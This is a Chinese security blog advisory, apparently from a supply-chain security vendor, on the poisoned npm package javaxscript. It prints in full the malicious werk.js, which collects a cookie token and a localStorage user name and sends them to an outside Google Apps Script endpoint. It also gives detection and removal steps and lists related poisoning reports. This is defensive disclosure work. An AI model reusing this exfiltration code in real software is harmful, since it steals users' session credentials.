SBOM风险预警 | NPM前端框架 javaxscript 遭受投毒窃取浏览器cookie

最新推荐文章于 2025-08-23 16:20:06 发布
最新推荐文章于 2025-08-23 16:20:06 发布
阅读量325 收藏 3
点赞数 4
CC 4.0 BY-SA版权
文章标签: npm 前端框架 前端 软件供应链安全厂商 软件供应链安全工具 人工智能
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_72305072/article/details/150548337

SBOM情报概述

Summary

近日(2025.08.13),悬镜供应链安全情报中心在NPM官方仓库中捕获1起针对JS前端框架组件 javaxscript 的投毒攻击事件,该组件托管在GitHub上的项目源码在1.1.93及后续版本中被植入恶意代码,恶意代码一旦被加载将会盗取用户浏览器cookie敏感数据并回传到投毒者控制的服务器接口。 

图片

javaxscript恶意包主页

截至目前,该恶意组件仍正常托管在NPM官方源及国内各大主流镜像源,对于NPM开发者来说存在较大安全隐患。根据官方统计接口,该恶意包的总下载量超过23000次。

投毒分析

Poisoning Analysis

1

github项目投毒  

javaxscript组件项目源代码托管在Github平台(https://github.com/Patrick-ring-motive/framework),并通过Github WorkFlow自动构建并发版推送到NPM官方仓库。在北京时间2025年8月12号,项目维护者(Patrick-ring-motive)创建了包含恶意代码的werk.js文件,该恶意文件最终被自动打包并随着组件一同发布到NPM官方仓库(registry.npmjs.org)。

图片

投放恶意文件werk.js

2

窃取浏览器cookie数据

恶意文件werk.js负责解析并提取用户浏览器localStorage以及Cookie中的用户名与token相关敏感数据,窃取的数据最终被base64编码后通过HTTP GET方式发送到投毒者可控的服务器API。

图片

werk.js投毒代码

(() => {  const parse = (x) => {    try {      return JSON.parse(x);    } catch {      return x;    }  };  let eagleid = Object.fromEntries(document.cookie.split(";").map((x) => String(x).trim().split("=")).map((x) => [x.shift(), x.join("=")])).id_token_marker;  let name = String(parse(localStorage.getItem("user"))?.FirstName);  const url = new URL("https://script.google.com/macros/s/AKfycbzCqAhWZNUcRaKvXSE9EhSgWvCY4xCgY0U2ksr_nv_eCGd2i-oh8cznalBfqSkSn7C6Vw/exec",);  url.searchParams.set("payload",btoa(encodeURIComponent(JSON.stringify({ eagleid, name }))));  (async () => {    try {      await import(url);    } catch {}    [...document.querySelectorAll(`[id="person"]>[id="title"]:not([x10]),[id*="orgItemInfoContainer"]:has([href="https://apps.usaa.com/enterprise/employee-directory?emplNum=Y3953"]) [id*="orgJobTitle"]:not([x10])`,)].forEach((x) => {      x.innerText = "10x Software Engineer";      x.setAttribute("x10", true);    });    [...document.querySelectorAll("[missing]")].forEach((x) => x.remove());  })();})();

3

IoC 数据

本文分析所涉及的恶意IoC数据如下表所示:

图片

排查方式

Investigation Method

开发者可通过命令 npm list javaxscript 在项目目录下使用查询是否已安装存在恶意投毒的组件版本,如果已安装请立即使用 npm uninstall javaxscript进行卸载。同时还需关闭系统网络并排查系统是否存在异常进程。

此外,也可使用 OpenSCA-cli 工具将受影响的组件包按如下示例保存为db.json文件,直接执行扫描命令(opensca-cli -db db.json -path ${project_path}),即可快速获知您的项目是否受到投毒包影响。

​​​​​​​

[     {         "product":"javaxscript",         "version":"[1.1.93, 1.1.94, 1.1.95, 1.1.96]",         "language":"javascript",         "id":"XMIRROR-MAL45-4223C53C",         "description": "NPM组件javaxscript遭受代码投毒窃取浏览器cookie数据",         "release_date": "2025-08-13"     }]

悬镜供应链安全情报中心是国内首个数字供应链安全情报研究中心。依托悬镜安全团队强大的供应链SBOM管理与监测能力和AI安全大数据云端分析能力,悬镜云脉XSBOM数字供应链安全情报预警服务通过对全球数字供应链投毒情报、漏洞情报、停服断供情报等进行实时动态监测与溯源分析,可为用户智能精准预警“与我有关”的数字供应链安全情报,提供情报查询、情报订阅、可视化关联分析等企业级服务。

SBOM情报预警 | 恶意NPM组件窃取Solana智能合约私钥
Anprou的博客
02-21 986
投毒代码一旦监控捕获到剪切板中的Solana智能合约私钥,会立即通过 ioredis 模块将私钥数据外传投递到投毒者控制的redis服务器(redis-12193.c259.us-central1-2.gce.redns.redis-cloud.com:12193)。以 serum-anchor-wallet 恶意组件为例,该系列恶意组件将投毒代码经过混淆后嵌入到lib/app.js 代码文件中,并伪装成Solana智能合约SDK。恶意NPM包 serum-anchor-wallet。
供应链风险情报预警 | 恶意NPM包(fix-this)开展反向shell远控投毒
Anprou的博客
02-21 943
fix-this NPM组件包在3.0.9及之后的版本中 lib/utils/connectionUtils.js 代码文件的 validateSystemResultsV2() 函数被投毒者植入混淆恶意代码,恶意代码主要功能用于执行反向shell远控,针对目前已投放的4个版本恶意包中,涉及到的远控服务器地址及端口如下所示。一旦开发者安装fix-this恶意包时,将自动触发执行validateSystemResultsV2 函数中的反向shell远控代码,导致系统被投毒者远程控制。
SBOM风险预警 | 恶意NPM组件开展木马投毒攻击,目标针对国内泛互企业
Anprou的博客
03-31 999
这些恶意组件会利用代码混淆和沙箱环境识别来进行安全检测对抗,在组件安装过程中会静默执行投毒代码,除了窃取系统敏感信息之外,还负责远程下载或本地释放并执行恶意木马程序。依托悬镜安全团队强大的供应链SBOM管理与监测能力和AI安全大数据云端分析能力,悬镜云脉XSBOM数字供应链安全情报预警服务通过对全球数字供应链投毒情报、漏洞情报、停服断供情报等进行实时动态监测与溯源分析,可为用户智能精准预警“与我有关”的数字供应链安全情报,提供情报查询、情报订阅、可视化关联分析等企业级服务。migu-lib恶意包主页。
重大SBOM风险预警 | 总下载量超百万次开源NPM组件被投毒
Anprou的博客
03-31 684
近日(2025.03.25),悬镜供应链安全情报中心在NPM官方仓库(www.npmjs.com)中捕获1起针对全球知名薪酬数据统计平台 PayScale 旗下开源NPM组件 country-currency-map的供应链投毒事件。工具将受影响的组件包按如下示例保存为db.json文件,直接执行扫描命令(opensca-cli -db db.json -path ${project_path}),即可快速获知您的项目是否受到投毒包影响。依赖country-currency-map组件的开源项目。
SBOM风险预警 | pino系列投毒包开展敏感数据窃取及远程代码执行攻击
软件供应链安全选型指南
06-06 739
根据NPM官方接口统计,近一个月该pino系列恶意包的总下载量接近7000次。如下图所示,投毒者通过篡改包模块入口文件pino.js,利用require引入恶意模块'./lib/write',对应恶意代码文件'./lib/write.js',并且在对pino()函数进行劫持,在函数入口处优先调用恶意模块./lib/write.js中的writer()函数。以router-parse 恶意包为例,投毒者通过对日志库pino进行完整项目代码克隆,组件包主模块入口为pino.js代码文件。
SBOM风险预警 | 恶意Py组件pretty-cli-logger开展远程代码投毒攻击
软件供应链安全选型指南
04-30 838
投毒者在 pretty-cli-logger 组件1.1.1和1.1.2两个版本代码文件 colors.py 中植入混淆代码, 一旦安装该组件则会静默触发执行恶意代码,主要功能是将组件包中内置的第一阶段和第二阶段混淆恶意代码解压还原后执行,第二阶段恶意代码进一步判断操作系统类型(Windows及Mac)并从投毒者服务器拉取执行针对不同类型系统投放的第三阶段攻击代码。第一阶段混淆恶意代码还原后如下所示,主要功能是将内嵌的base64编码的第二阶段恶意代码释放到系统临时目录下保存并执行。
2025供应链风险情报预警 | 恶意NPM包(fix-this)开展反向shell远控投毒
软件供应链安全选型指南
03-25 748
fix-this NPM组件包在3.0.9及之后的版本中 lib/utils/connectionUtils.js 代码文件的 validateSystemResultsV2() 函数被投毒者植入混淆恶意代码,恶意代码主要功能用于执行反向shell远控,针对目前已投放的4个版本恶意包中,涉及到的远控服务器地址及端口如下所示。一旦开发者安装fix-this恶意包时,将自动触发执行validateSystemResultsV2 函数中的反向shell远控代码,导致系统被投毒者远程控制。
NPM新型攻击通过后门投毒本地包
smellycat000的专栏
03-27 517
该攻击的危险性在于,即使卸载了“ethers-provider2”,ethers 包上的后门也不会被删除,因此合法包仍然是受影响的。第一个包在本文成文之时仍然可从npm上找到,它基于热门的npm包 “ssh2”,但具有一个修改过的 “install.js” 脚本,从外部来源下载第二阶段的payload。总体而言,从包索引如 PyPI 和 npm 中下载程序包时,建议仔细审查它们的合法性(及发布者的合法性),并检查代码中的风险指标如混淆代码和外部服务器的调用。为此,我们推出“供应链安全”栏目。
供应链投毒预警 | utilitytool系列Py包开展XenoRAT远控木马投毒
Anprou的博客
06-21 896
上周,悬镜供应链安全情报中心在Pypi官方仓库(https://pypi.org/)中捕获2起针对Windows系统的Python包投毒事件。
供应链投毒预警 | 恶意Py组件tohoku-tus-iot-automation开展窃密木马投毒攻击
Anprou的博客
03-18 1217
上周(2024年3月6号),悬镜供应链安全情报中心在Pypi官方仓库(https://pypi.org/)中捕获1起新的Py包投毒事件,Python组件tohoku-tus-iot-automation从3月6号开始连续发布6个不同版本恶意包,其中多个版本恶意代码使用PyArmor进行加密混淆保护,这些恶意包主要针对Windows平台的Python开发者,除了会窃取系统基础信息和主流浏览器(Edge、Chrome)用户密码数据,还会远程下载木马程序植入到开发者系统中盗取系统密码。
解决前端 NPM 包冲突的有效策略
AI架构全栈开发实战笔记
07-11 431
本文旨在帮助前端开发者理解NPM包冲突的本质,掌握诊断和解决包冲突的有效方法。内容涵盖从基础概念到实际解决方案的全过程,适用于各种规模的前端项目。核心概念与联系:解释NPM包冲突的基本原理常见冲突类型:分析不同类型的包冲突解决策略:提供详细的解决方案和最佳实践实际案例:通过代码示例展示解决方法工具和资源:推荐有用的工具和资源NPM:Node Package Manager,Node.js的包管理工具依赖:项目运行或构建所需的外部代码包语义化版本(SemVer)
NPM组件 @angular_devkit/core 等窃取主机敏感信息
murphysec的博客
08-21 611
【高危】多个NPM组件(如@angular_devkit/core、microsoft-bonsai-api等)存在投毒风险,安装后会窃取主机名、用户名、IP地址等敏感信息并发送至攻击者服务器。影响范围广,涉及Angular开发工具、微软Bonsai API、Solana生态等领域组件。利用成本低,建议立即排查移除受影响包,删除node_modules及package-lock.json后重装依赖,全面检查系统安全,加强依赖管理,避免使用未知来源包。
pnpm : 无法加载文件 C:\Program Files\nodejs\pnpm.ps1,因为在此系统上禁止运行脚本。
weixin_45561719的博客
08-20 270
3、执行set-ExecutionPolicy,会提示输入参数,此时输入RemoteSigned回车。2、执行Get-ExecutionPolicy,显示Restricted。1、以管理员身份运行window powershell。
微信小程序集成vant-weapp时,构建npm报错的解决办法
lyzhangxiaowei的博客
08-21 218
Vant移动端组件库在微信小程序安装报错的解决方案:当安装Vant组件库时出现"NPM packages not found"错误,原因是缺少package.json文件。正确步骤应先在项目根目录执行npm init -y生成package.json,再安装@vant/weapp;同时需在project.config.json中配置packNpmManually和packNpmRelationList参数,并移除app.json中的"style": "v2&
npm全局安装后,cmd命令行可以访问,vscode访问报错
陌上花开
08-21 461
【代码】npm全局安装后,cmd命令行可以访问,vscode访问报错。
配置npm国内源(包含主流npm镜像源地址)
ASP.NET
08-23 526
摘要:通过修改npm配置为国内镜像源可提升下载速度。常用方法包括临时使用--registry参数或永久修改配置(npm config set registry)。推荐镜像源有阿里云、腾讯云、华为云等。使用nrm工具可快速切换源(nrm use),测试延迟(nrm test)。注意事项:企业私有源需配置认证,镜像同步可能有延迟,部分镜像可能修改包内容。恢复官方源命令:npm config set registry https://registry.npmjs.org。(149字)
运行npm run命令报错“error:0308010C:digital envelope routines::unsupported”
最新发布
gc_2299的博客
08-23 171
运行npm run命令报错“error:0308010C:digital envelope routines::unsupported”
5.3 包管理工具 npm yarn pnpm 对比
chxii的专栏
08-20 942
工具发布时间开发者定位npm2010 年Node.js 官方包管理器Yarn2016 年Facebook(现 Meta)更快、更可靠的替代方案pnpm2016 年高性能、节省磁盘空间npm:生态最成熟,适合简单项目和新手,但在效率和资源管理上落后于后两者。Yarn:平衡了速度、安全性和兼容性,适合团队协作和需要缓存优化的场景。pnpm:性能和资源管理最优,依赖隔离严格,是现代化项目(尤其是 monorepo)的首选,但需注意工具兼容性。
Nodejs 与npm
m0_66705547的博客
08-20 554
摘要:Node.js是一个强大的JavaScript运行时环境,广泛应用于Web服务器开发、实时应用构建和命令行工具开发。文章介绍了如何使用npm(Node包管理器)创建项目、安装依赖(如Express框架)和配置启动脚本,并演示了创建简单Web服务器的过程。通过示例代码展示了Express框架处理路由请求的功能,包括首页、登录和注册页面。最后通过curl命令测试了服务器响应,验证了Node.js在Web开发中的高效性和便捷性。
npm 包有风险
07-06
### npm安全性与风险检测 npm 是 JavaScript 生态系统中最常用的包管理工具,但其庞大的依赖树也带来了潜在的安全风险。为了识别和避免使用存在漏洞的 npm 包,开发者可以采取多种策略和技术手段。 #### 风险识别方法 1. **内置工具:`npm audit`** `npm audit` 是 npm 自带的漏洞扫描工具,能够检查项目中是否存在已知的安全漏洞,并提供修复建议。执行命令后,它会列出所有受影响的依赖及其严重程度等级。 ```bash npm audit ``` 2. **第三方工具:Snyk 和 Socket** Snyk 提供了更深入的依赖分析功能,支持持续集成(CI)环境中的自动化检测[^1]。Socket 则专注于检测供应链攻击,帮助识别恶意行为或异常依赖项。这些工具通常具有更高的准确性和更丰富的漏洞数据库。 3. **依赖更新策略:Dependabot 与 RenovateBot** 可以配置 Dependabot 或 RenovateBot 实现自动化的依赖更新。这些工具会在发现新版本时创建 Pull Request,并确保在合并前通过安全测试。 4. **幽灵依赖检测:depcheck** 幽灵依赖是指未在 `package.json` 中声明但实际被使用的依赖项。它们可能因其他依赖包的升级而被意外移除,导致运行时错误。可以通过 `depcheck` 工具检测并显式声明这些依赖[^2]。 #### 如何避免使用有漏洞的 npm 包 - **锁定依赖版本:`package-lock.json`** 使用 `package-lock.json` 文件可以确保每次安装的依赖版本一致,防止因依赖升级引入未知漏洞。 - **定期扫描依赖树** 在开发过程中,应定期运行 `npm audit` 或集成 Snyk 等工具到 CI/CD 流程中,确保依赖链始终处于安全状态[^1]。 - **限制依赖数量** 依赖越多,潜在风险越大。尽量减少不必要的依赖,优先选择维护活跃、社区认可度高的库。 - **使用 SBOM(软件物料清单)** 未来趋势之一是采用 SBOM 记录所有组件来源,这有助于追踪每个依赖的出处和历史变更记录。 - **签名验证与沙盒安装** 对于关键项目,可启用包发布者的签名验证机制,确保下载的依赖来源可信。同时,使用沙盒环境隔离依赖安装过程,降低供应链攻击的风险。 #### 漏洞修复流程 1. 执行 `npm audit fix` 自动修复低风险问题: ```bash npm audit fix ``` 2. 对于无法自动修复的高危漏洞,需手动升级依赖版本或寻找替代方案。 3. 若发现零日漏洞(尚未公开披露的漏洞),应及时联系供应商或社区寻求解决方案。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值